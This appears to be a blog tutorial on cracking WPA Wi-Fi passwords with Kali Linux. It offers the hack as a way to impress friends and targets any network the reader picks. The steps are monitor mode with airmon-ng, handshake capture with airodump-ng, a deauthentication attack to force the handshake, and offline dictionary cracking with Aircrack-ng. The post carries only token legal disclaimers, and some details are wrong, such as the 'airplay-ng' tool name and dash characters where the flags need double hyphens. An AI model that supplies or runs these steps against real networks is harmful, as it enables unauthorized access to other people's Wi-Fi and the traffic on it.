How Get Wifi Password in Kali Linux using Airmon-ng: Want to learn hacking Wi-Fi password? Do you want to impress your friends by doing so? Then you are in the right place. In this tutorial, we will teach you how get Wi-Fi password using Kali Linux.
Let’s start this article without wasting your time. Read this article completely to learn this tutorial completely.

Disclaimer
This article is only for educational purposes. If you misuse this knowledge or hack other’s password without their permission, you may end up in police custody. So, do not misuse this information and stay safe.
Ethical Hacking Tool will not be responsible if you get stuck into legal proceedings. So, use this article as a piece of knowledge. You will not become an ethical hacker by hacking Wi-Fi.
Things required for how get Wifi Password
- Kali Linux system (Installed or Live but do not use it in Virtual Machine).

- Windows 10 system

- Aircrack-ng for Windows. Download it from here.
- One million dictionary word list. Download it from here.
- Knowledge to operate Kali Linux.

- High-frequency Wi-Fi which you want to hack.
Let us start our tutorial: How get Wifi Password
- Open Kali Linux.
- Now, open your Terminal.
Make sure you are a root user.
- If you are not a root user, type sudo bash and hit enter.
- After that, Check your network configuration by typing ifconfig and hit enter button.

After that, you will see your Ethernet, Wi-Fi.
- Now type airmon-ng and press enter.
After that, we will kill all the processes which may cause trouble.
- Type airmon-ng check kill and hit enter.
- After that, type airmon-ng start wlan0 to start monitoring mode in wlan0.

- Now, type airodump-ng wlan0mon in order to see all available networks.

- After that, copy the BSSID of the network you want to hack.
- Now type the following command given below:
airodump-ng –bssid XX:XX:XX:XX:XX:XX -c 1 -w /root/Desktop/wifi wlan0mon
Note: XX:XX:XX:XX:XX:XX is your BSSID. So do not forget to replace it with your BSSID.
- In a new terminal, type the folloning give command:
airplay-ng –deauth 20 -a XX:XX:XX:XX:XX:XX wlan0mon
- Now, Capture the Handshake and copy the Handshake files saved on your Desktop.
After that, we will open Windows 10 operating system to crack captured handshake.
Cracking Captured Handshake: How get Wifi Password
To crack capture handshake, we will launch Airmon-ng downloaded by us in the previous step.
- Open Airmon-ng folder, then open bin folder and then launch Aircrack-ng GUI.

- Choose your captured file in Filename(s).
- Choose WPA Encryption.
- After that, select your One million dictionary word list in Wordlist.

- Finally, hit the Launch button.
Now, wait for sometimes as it will take some time to get the password.
Hurrah! You have learned how get Wifi Password.
How get Wifi Password Using Kali Linux: Conclusion
In conclusion, we will say that never try to misuse these tools as you may reach behind the bars for hacking others’ Wi-Fi without their permission.
This article is purely for educational purposes. Ethical Hacking Tool will not be responsible for you if you misuse this knowledge.
We hope that you have successfully learned how get WiFi password. If you liked our tutorial, then share it in your circle. Drop a comment below to share your views on this article. Do not forget to subscribe to our Newsletter. Otherwise, you will miss important updates.
We also write articles on user demand. You can request for articles on any topic in the comment section. It is completely free. We do not charge even a single dollar for this service. We would try to provide you your demanded article as soon as possible.
You can also read: Lean Facebook Account Hacking
How to limit data usage on Windows 10 laptop?
I will post an article on this topic soon. Till then, stay tuned with us.